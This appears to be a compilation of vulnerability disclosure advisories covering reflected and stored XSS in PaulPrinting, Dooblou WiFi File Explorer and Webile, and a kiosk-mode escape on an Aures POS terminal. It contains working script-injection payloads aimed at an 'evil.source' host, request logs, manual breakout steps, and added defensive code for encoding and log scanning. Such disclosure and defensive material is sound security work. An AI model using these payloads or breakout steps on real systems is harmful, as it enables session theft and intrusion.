Open Authentication (Anonymous Privileges)

User Interaction:
=================
Medium User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
A client-side cross site scripting vulnerability has been discovered in the official PaulPrinting (v2018) cms web-application.
Remote attackers are able to manipulate client-side requests by injection of malicious script code to compromise user session data.

The client-side cross site scripting web vulnerability is located in the search input field with the insecure validated q parameter affecting the delivery module.
Remote attackers are able to inject own malicious script code to the search input to provoke a client-side script code execution without secure encode.
The request method to execute is GET and the attack vector is non-persistent.

Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious source and non-persistent manipulation of affected application modules.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] /account/delivery

Vulnerable Input(s):
[+] Search

Vulnerable Parameter(s):
[+] q

Affected Module(s):
[+] /account/delivery
[+] Delivery Contacts

Proof of Concept (PoC):
=======================
The non-persistent xss web vulnerability can be exploited by remote attackers with low privileged user account and medium user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Example
https://codeawesome.in/printing/account/delivery?q=

PoC: Exploitation
https://codeawesome.in/printing/account/delivery?q=a"><iframe src=evil.source onload=alert(document.cookie)>

--- PoC Session Logs (GET) ---
https://codeawesome.in/printing/account/delivery?q=a"><iframe src=evil.source onload=alert(document.cookie)>
Host: codeawesome.in
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Cookie: member_login=1; member_id=123; session_id=25246428fe6e707a3be0e0ce54f0e5bf;
-
GET: HTTP/3.0 200 OK
content-type: text/html; charset=UTF-8
x-powered-by: PHP/7.1.33

Vulnerable Source: (Search - delivery?q=)
<div class="col-lg-8">
<a href="https://codeawesome.in/printing/account/delivery" class="btn btn-primary mt-4 mb-2 float-right">
<i class="fa fa-fw fa-plus"></i>
</a>
<form class="form-inline mt-4 mb-2" method="get">
<div class="input-group mb-3 mr-2">
<input type="text" class="form-control" name="q" value="a"><iframe src="evil.source" onload="alert(document.cookie)">">
<div class="input-group-append">
<button class="btn btn-outline-secondary" type="submit" id="button-addon2"><i class="fa fa-fw fa-search"></i></button>
</div></div>

Security Risk:
==============
The security risk of the cross site scripting web vulnerability with non-persistent attack vector is estimated as medium.

Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
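The fix that the BoomCMS, Active Super Shop and PaulPrinting advisories above all recommend, encoding the title/description, name/phone and q values before they are written into the page, as an added JavaScript example. It is not code from any of those products; the render functions only imitate the vulnerable markup quoted in the advisories, and the payloads are the ones the advisories show.

```javascript
// Added example, not code from BoomCMS, Active Super Shop or PaulPrinting.
// Demonstrates context-aware HTML output encoding, the fix the advisories
// above recommend, against the exact payloads those advisories reproduce.

// Escape the five characters that can change HTML parsing inside element
// content or inside a double-quoted attribute value.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Imitation of the PaulPrinting search field: q is concatenated raw into a
// double-quoted attribute, so a value beginning with "> closes the <input>.
function renderSearchInputVulnerable(q) {
  return `<input type="text" class="form-control" name="q" value="${q}">`;
}

// Hardened form: the value is encoded for the attribute context, so the
// quote and angle brackets stay inside the attribute as text.
function renderSearchInput(q) {
  return `<input type="text" class="form-control" name="q" value="${escapeHtml(q)}">`;
}

// Imitation of the BoomCMS album heading: name and description land in
// element content, where a bare <script> or <a onmouseover=...> executes.
function renderAlbumHeadingVulnerable(name, description) {
  return `<h1 class="bigger b-editable" contenteditable="true">${name}</h1>\n` +
         `<p class="description b-editable" contenteditable="true">${description}</p>`;
}

// Hardened form: both values are encoded for the element-content context.
function renderAlbumHeading(name, description) {
  return `<h1 class="bigger b-editable" contenteditable="true">${escapeHtml(name)}</h1>\n` +
         `<p class="description b-editable" contenteditable="true">${escapeHtml(description)}</p>`;
}

// Structural check: count the tags in a rendered fragment. Encoded input must
// never add tags beyond the ones the template itself contains.
function countTags(html) {
  const tags = html.match(/<[a-zA-Z/][^>]*>/g);
  return tags ? tags.length : 0;
}

// Payloads as quoted in the advisories above.
const PAYLOAD_Q = 'a"><iframe src=evil.source onload=alert(document.cookie)>';
const PAYLOAD_NAME = '"><script>alert(document.cookie)</script><div style=1';
const PAYLOAD_DESCRIPTION = '<a onmouseover=alert(document.cookie)>test</a>';

// Stand-alone demonstration: the template has one tag; the vulnerable render
// grows to two, the encoded render stays at one.
console.log('search vulnerable tags:', countTags(renderSearchInputVulnerable(PAYLOAD_Q)));
console.log('search encoded tags:   ', countTags(renderSearchInput(PAYLOAD_Q)));
console.log('album vulnerable tags: ', countTags(renderAlbumHeadingVulnerable(PAYLOAD_NAME, PAYLOAD_DESCRIPTION)));
console.log('album encoded tags:    ', countTags(renderAlbumHeading(PAYLOAD_NAME, PAYLOAD_DESCRIPTION)));
```

escapeHtml only covers element content and double-quoted attribute values; a value written into a URL attribute such as href, into inline JavaScript, or into CSS needs the encoding or validation rules of that context instead.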
14. # Exploit Title: Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2317

Release Date:
=============
2023-07-04

Vulnerability Laboratory ID (VL-ID):
====================================
2317

Common Vulnerability Scoring System:
====================================
5.1

Vulnerability Class:
====================
Multiple

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
Browse, download and stream individual files that are on your Android device, using a web browser via a WiFi connection. No more taking your phone apart to get the SD card out or grabbing your cable to access your camera pictures and copy across your favourite MP3s.

(Copy of the Homepage: https://play.google.com/store/apps/details?id=com.dooblou.WiFiFileExplorer )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple web vulnerabilities in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application.

Affected Product(s):
====================
Product Owner: dooblou
Product: Dooblou WiFi File Explorer v1.13.3 - (Android) (Framework) (Wifi) (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2022-01-19: Researcher Notification & Coordination (Security Researcher)
2022-01-20: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-04: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (Guest Privileges)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Independent Security Research

Technical Details & Description:
================================
Multiple input validation web vulnerabilities have been discovered in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application.
The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser to web-application requests from the application-side.

The vulnerabilities are located in the `search`, `order`, `download`, `mode` parameters. The requested content via get method request is insecure validated and executes malicious script codes.
The attack vector is non-persistent and the request method to inject is get. Attackers do not need to be authorized to perform an attack to execute malicious script codes.
The links can be included as malformed upload for example to provoke an execution by a view of the front- & backend of the wifi explorer.

Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious source and non-persistent manipulation of affected application modules.

Proof of Concept (PoC):
=======================
The input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction.
For security demonstration or to reproduce the web vulnerabilities follow the provided information and steps below to continue.

PoC: Exploitation
http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)><br>PLEASE CLICK PATH TO RETURN INDEX</a>
http://localhost:8000/storage/emulated/0/Download/?mode=31&search=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert%28document.domain%29%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX%3C%2Fa%3E&x=3&y=3
http://localhost:8000/storage/emulated/0/Download/?mode=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3
http://localhost:8000/storage/emulated/?order=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX

Vulnerable Sources: Execution Points
<table width="100%" cellspacing="0" cellpadding="16" border="0"><tbody><tr><td style="vertical-align:top;">
<table style="background-color: #FFA81E; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position:top;" width="700" cellspacing="3" cellpadding="5" border="0">
<tbody><tr><td><center><span class="doob_large_text">ERROR</span></center></td></tr></tbody></table><br>
<table style="background-color: #B2B2B2; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position:top;" width="700" cellspacing="3" cellpadding="5" border="0">
<tbody><tr><td><span class="doob_medium_text">Cannot find file or directory! /storage/emulated/0/Download/<a href="https://evil.source" onmouseover="alert(document.domain)"><br>PLEASE CLICK USER PATH TO RETURN INDEX</a></span></td></tr></tbody></table><br>
<span class="doob_medium_text"><span class="doob_link">&nbsp;&nbsp;<a href="/">>>&nbsp;Back To Files&nbsp;>></a></span></span><br></td></tr></tbody></table><br>
-
<li></li></ul></span></span></td></tr></tbody></table></div><div class="body row scroll-x scroll-y"><table width="100%" cellspacing="0" cellpadding="6" border="0"><tbody><tr>
<td style="vertical-align:top;" width="100%"><form name="multiSelect" style="margin: 0px; padding: 0px;" action="/storage/emulated/0/Download/" enctype="multipart/form-data" method="POST">
<input type="hidden" name="fileNames" value=""><table width="100%" cellspacing="0" cellpadding="1" border="0" bgcolor="#000000"><tbody><tr><td>
<table width="100%" cellspacing="2" cellpadding="3" border="0" bgcolor="#FFFFFF"><tbody><tr style="background-color: #FFA81E; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position:top;" height="30"><td colspan="5"><table width="100%" cellspacing="0" cellpadding="0" border="0"><tbody><tr><td style="white-space: nowrap;vertical-align:middle"><span class="doob_small_text_bold">&nbsp;</span></td><td style="white-space: nowrap;vertical-align:middle" align="right"><span class="doob_small_text_bold">
&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=23&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN INDEX&search=a">
<img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img" title="Details"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;
<a href="?view=24&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN INDEX&search=a">
<img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;
<a href="?view=38&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN I
-
<td style="white-space: nowrap;vertical-align:middle"><input value="" type="checkbox" name="selectAll" onclick="setCheckAll();">&nbsp;&nbsp;<a class="doob_button" href="javascript:setMultiSelect('/storage/emulated/', 'action', '18&order=>" <<="">>"<a href="https://evil.source" onmouseover=alert(document.domain)">');javascript:document.multiSelect.submit();" style="">Download</a>&nbsp;<a class="doob_button" href="javascript:setMultiSelectConfirm('Are you sure you want to delete? This cannot be undone!', '/storage/emulated/', 'action', '13&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>');javascript:document.multiSelect.submit();" style="">Delete</a>&nbsp;
<a class="doob_button" href='javascript:setMultiSelectPromptQuery("Create Copy", "/storage/emulated/", "/storage/emulated/", "action", "35&order=>"<<<a href="https://evil.source" onmouseover=alert(document.domain)>", "name");javascript:document.multiSelect.submit();' style="">Create Copy</a>&nbsp;<a class="doob_button" href="x99_dooblou_pro_version.html" style="">Zip</a>&nbsp;<a class="doob_button" href="x99_dooblou_pro_version.html" style="">Unzip</a></td>
<td align="right" style="white-space: nowrap;vertical-align:middle"><span class="doob_small_text_bold">&nbsp;&nbsp;&nbsp;&nbsp;<a href="javascript:showTreeview()"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_tree_dark.png" alt="img" title="Show Treeview"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;
<a href="?view=23&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img" title="Details"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;
<a href="?view=24&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;
<a href="?view=38&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_grid.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;</span></td></tr></table>

--- PoC Session Logs ---
http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)><br>PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xml
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost:8000/storage/emulated/0/Download/%3Ca%20href=%22https://evil.source%22%20onmouseover=alert(document.domain)%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3E
GET: HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
-
http://localhost:8000/storage/emulated/0/Download/?mode=<a+href%3D"https%3A%2F%2Fevil.source"+onmouseover%3Dalert(document.domain)><br>PLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: treeview=0
Upgrade-Insecure-Requests: 1
GET: HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html
-
http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)><br>PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xml
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost:8000/storage/emulated/0/Download/%<a href="https://evil.source" onmouseover=alert(document.domain)>%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3E
GET: HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml

Security Risk:
==============
The security risk of the multiple web vulnerabilities in the ios mobile wifi web-application is estimated as medium.
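A log-side check for the reflected search/order/mode parameter pattern the Dooblou advisory above describes, as an added JavaScript example that is not part of the advisory or of the product. The access-log lines are constructed from the PoC URLs quoted above, and the Combined Log Format layout, the parameter list and the markup patterns are assumptions for the example.

```javascript
// Added example, not part of the Dooblou advisory or application. Scans
// access-log lines for GET requests whose path or watched query parameters
// carry markup, which is what the PoC URLs above look like on the server side.

// Parameters the advisory names as vulnerable (assumed list for the example);
// the request path is always checked because the first PoC injects into it.
const WATCHED_PARAMS = new Set(['search', 'order', 'mode', 'download', 'q']);

// Fragments that have no place in a file name, sort order or search term.
const MARKUP_PATTERNS = [
  /<\s*[a-z!\/]/i,      // start of a tag such as <a or <br
  /\bon[a-z]+\s*=/i,    // inline event handler such as onmouseover=
  /javascript\s*:/i,    // javascript: URL scheme
  /["'][^"']*>/,        // quote followed by a closing bracket (attribute breakout)
];

// Percent-decode, but fall back to the raw text on malformed escapes: the
// session logs above contain a Referer with a bare "%<a", which would
// otherwise make decodeURIComponent throw and abort the whole scan.
function safeDecode(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

function looksLikeMarkup(value) {
  return MARKUP_PATTERNS.some((re) => re.test(value));
}

// Inspect one absolute URL; returns a list of {where, value} findings.
function inspectUrl(rawUrl) {
  let url;
  try { url = new URL(rawUrl); } catch (e) { return [{ where: 'unparseable', value: rawUrl }]; }
  const findings = [];
  const path = safeDecode(url.pathname);
  if (looksLikeMarkup(path)) findings.push({ where: 'path', value: path });
  // searchParams already decodes %xx escapes and turns + into a space.
  for (const [name, value] of url.searchParams) {
    if (WATCHED_PARAMS.has(name) && looksLikeMarkup(value)) {
      findings.push({ where: name, value });
    }
  }
  return findings;
}

// Pull the request target out of a Combined Log Format line (assumed layout)
// and inspect it. Relative targets are resolved against the explorer's origin.
function inspectLogLine(line, origin = 'http://localhost:8000') {
  const m = line.match(/"(?:GET|POST|PUT)\s+(\S+)\s+HTTP\/[\d.]+"/);
  if (!m) return [];
  return inspectUrl(m[1].startsWith('http') ? m[1] : origin + m[1]);
}

// Return the findings for every line that produced at least one.
function scanLog(lines) {
  return lines.map((line) => inspectLogLine(line)).filter((f) => f.length > 0);
}

// Constructed sample log: one benign listing request, then the three PoC
// requests from the advisory (search, order and raw path injection).
const SAMPLE_LOG = [
  '192.0.2.10 - - [04/Jul/2023:10:00:00 +0000] "GET /storage/emulated/0/Download/?mode=31&search=a&x=3&y=3 HTTP/1.1" 200 7866',
  '192.0.2.10 - - [04/Jul/2023:10:00:01 +0000] "GET /storage/emulated/0/Download/?mode=31&search=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert%28document.domain%29%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX%3C%2Fa%3E&x=3&y=3 HTTP/1.1" 200 7866',
  '192.0.2.10 - - [04/Jul/2023:10:00:02 +0000] "GET /storage/emulated/?order=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E HTTP/1.1" 200 7866',
  '192.0.2.10 - - [04/Jul/2023:10:00:03 +0000] "GET /storage/emulated/0/Download/%3Ca%20href=%22https://evil.source%22%20onmouseover=alert(document.domain)%3E HTTP/1.1" 200 7866',
];

// Stand-alone demonstration: prints where each flagged request carried markup.
for (const findings of scanLog(SAMPLE_LOG)) {
  for (const f of findings) console.log(`flagged in ${f.where}: ${f.value}`);
}
```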
15. Exploit Title: Webile v1.0.1 - Multiple Cross Site Scripting

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2321

Release Date:
=============
2023-07-03

Vulnerability Laboratory ID (VL-ID):
====================================
2321

Common Vulnerability Scoring System:
====================================
5.5

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server in the local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data, statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and other functions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. Support Mac, Windows, Linux, iOS, Android and other multi-platform operating systems.

(Copy of the Homepage: https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple persistent web vulnerabilities in the Webile v1.0.1 Wifi mobile android web application.

Affected Product(s):
====================
Product Owner: Webile
Product: Webile v1.0.1 - (Framework) (Mobile Web-Application)

Vulnerability Disclosure Timeline:
==================================
2022-10-11: Researcher Notification & Coordination (Security Researcher)
2022-10-12: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-03: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (Guest Privileges)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Independent Security Research

Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities have been discovered in the Webile v1.0.1 Wifi mobile android web application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side.

The persistent input validation web vulnerabilities are located in the send and add function.
Remote attackers are able to inject own malicious script codes to the new_file_name and i parameter post method request to provoke a persistent execution of the malformed content.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Parameter(s):
[+] new_file_name
[+] i

Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction.
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.

Vulnerable Source: Send
Send message to phone listing
<div class="layui-colla-item">
<div class="layui-card-header">Message</div>
<div class="layui-colla-content" style="display:block;padding-left:16px;">
<div class="layui-form-item layui-form-text" id="showMsg"><div><font color="blue">20:10:11</font><a href="javascript:;" title="Copy" onclick="copy(1658081411827)"><i class="iconfont">&nbsp;&nbsp;</i></a><br>
<span id="c_1658081411827">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span><br><br></div>
</div></div></div>

history logs messages
<table class="layui-table layui-form">
<thead><tr>
<th style="text-align: center;vertical-align: middle!important;border-left-width:1px;border-right-width:1px;height:32px;" width="2%" align="center">
<input type="checkbox" lay-filter="checkall" name="" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div></th>
<th style="border-right-width:1px;">Message</th>
<th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="15%">Date</th>
<th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="3%" valign="center">Action</th></tr>
</thead>
<tbody><tr>
<td style="text-align: center;vertical-align: middle!important;border-left-width:1px;min-height:180px;" align="center">
<input type="checkbox" name="id" value="3" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div>
</td>
<td style="height:32px;">
<span id="c_3">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span></td>
<td align="center">2022/07/17 20:10</td>
<td class="td-manage" style="border-right-width:1px;text-align:center;">
<a title="Copy" onclick="copy(3)" href="javascript:;">
<i class="iconfont">&nbsp;&nbsp;</i>
</a>
<a title="Delete" onclick="deleteLog(this,3)" href="javascript:;">
<i class="layui-icon">&nbsp;&nbsp;</i>
</a></td></tr></tbody></table>

--- PoC Session Logs #1 (POST) --- (Add)
http://localhost:8080/file_action
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 210
Origin: http://localhost:8080
Connection: keep-alive
Referer: http://localhost:8080/webile_files
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
i={"action":"create","file_path":"/storage/emulated/0","new_file_name":"pwnd23>"<iimg src=evil.source onload=alert(document.cookie)></iimg>"}
-
POST: HTTP/1.1 200 OK
Content-Type: application/json
Connection: keep-alive
Content-Encoding: gzip
Transfer-Encoding: chunked
-
http://localhost:8080/evil.source
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost:8080/webile_files
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Content-Type: application/octet-stream
Connection: keep-alive
Content-Length: 0
-
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6

--- PoC Session Logs #2 (POST) --- (Send)
http://localhost:8080/send
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 180
Origin: http://localhost:8080
Connection: keep-alive
Referer: http://localhost:8080/webile_send
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
i={"os":"Windows Windows 10","b":"firefox 102.0","c":">"<iimg src=evil.source onload=alert(document.cookie)></iimg>"}
-
POST: HTTP/1.1 200 OK
Content-Type: application/json
Connection: keep-alive
Content-Encoding: gzip
Transfer-Encoding: chunked
-
http://localhost:8080/evil.source
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost:8080/webile_send
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Content-Type: application/octet-stream
Date: Sun, 17 Jul 2022 18:08:33 GMT
Connection: keep-alive
Content-Length: 0

Security Risk:
==============
The security risk of the persistent web vulnerabilities in the mobile web application is estimated as medium.
16. Exploit Title: Aures Booking & POS Terminal - Local Privilege Escalation

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2323

Release Date:
=============
2023-07-17

Vulnerability Laboratory ID (VL-ID):
====================================
2323

Common Vulnerability Scoring System:
====================================
7.2

Vulnerability Class:
====================
Privilege Escalation

Current Estimated Price:
========================
3.000€ - 4.000€

Product & Service Introduction:
===============================
KOMET is an interactive, multifunctional kiosk specially designed for the fast food industry. Available as a wall-mounted or freestanding model, its design is especially adapted to foodservice such as take-aways or fast food in system catering. The kiosk features a 27 YUNO touch system in portrait mode, an ODP 444 thermal receipt printer, a payment terminal and a 2D barcode scanner. With a click, the customer selects, books, orders, purchases and pays directly at the kiosk. The system offers the possibility to manage customer cards and promotions. Queue management can also be optimized.

(Copy of the Homepage: https://aures.com/de/komet/ )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a local kiosk privilege escalation vulnerability in the operating system of the Aures Komet Booking & POS Terminal (Windows 10 IoT Enterprise) used by the German company immergrün franchise gmbh.

Affected Product(s):
====================
Aures Technologies GmbH
Product: Aures Komet Booking & POS Terminal - (KIOSK) (Windows 10 IoT Enterprise)

Vulnerability Disclosure Timeline:
==================================
2023-05-09: Researcher Notification & Coordination (Security Researcher)
2023-07-17: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Local

Severity Level:
===============
High

Authentication Type:
====================
Open Authentication (Anonymous Privileges)

User Interaction:
=================
No User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
A kiosk mode escalation vulnerability has been discovered in the operating system of the Aures Komet Booking & POS Terminal (Windows 10 IoT Enterprise) used by the German company immergrün franchise gmbh. The security vulnerability allows local attackers to bypass the kiosk mode to compromise the local file system and applications.

It is possible for local attackers to escalate out of the kiosk mode in the Aures Komet Booking & POS Terminal. Local attackers are able to use the touch functionalities in the Aures Komet Booking & POS Terminal system to escalate with higher privileges. The security vulnerability is located in the context menu function of the extended menu on touch interaction. Attackers with restricted low local privileged access to the booking service front display are able to execute files, can download contents without restriction or exfiltrate local file-system information of the compromised Windows based operating system. No keyboard or connections are required to manipulate the service booking and payment terminal. The booking and payment terminal system vulnerability requires no user interaction to become exploited and can only be triggered by local physical device access.

Vulnerable Operating System(s):
[+] Windows 10 (IoT Enterprise)

Affected Component(s):
[+] Context Menu

Affected Function(s):
[+] Web Search
[+] Share (Teilen)

Proof of Concept (PoC):
=======================
The local vulnerability can be exploited by local attackers with physical device access without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Sheet
Touch Display => Select Food Item => Highlight Text => Open Context Menu => Extend Context Menu => Web-Search => Browser => Local File System => Compromised!

Manual steps to reproduce the vulnerability ...
01. First touch the monitor display to move on from standby
02. Select a food item from the menu of immergrün (we recommend the cesar wraps)
03. Push the information button of the selected food item
04. Push twice via touch to mark the selected food item text
05. Press a third time after you have marked the context by holding it down on the touch display
06. Now the function context menu of the operating system for highlighted text appears
07. On the context menu appearing 3 dots to extend the visible function menu
08. Select the web-search or share function for the highlighted content in the context menu
09. The browser of the operating system opens on the main front screen
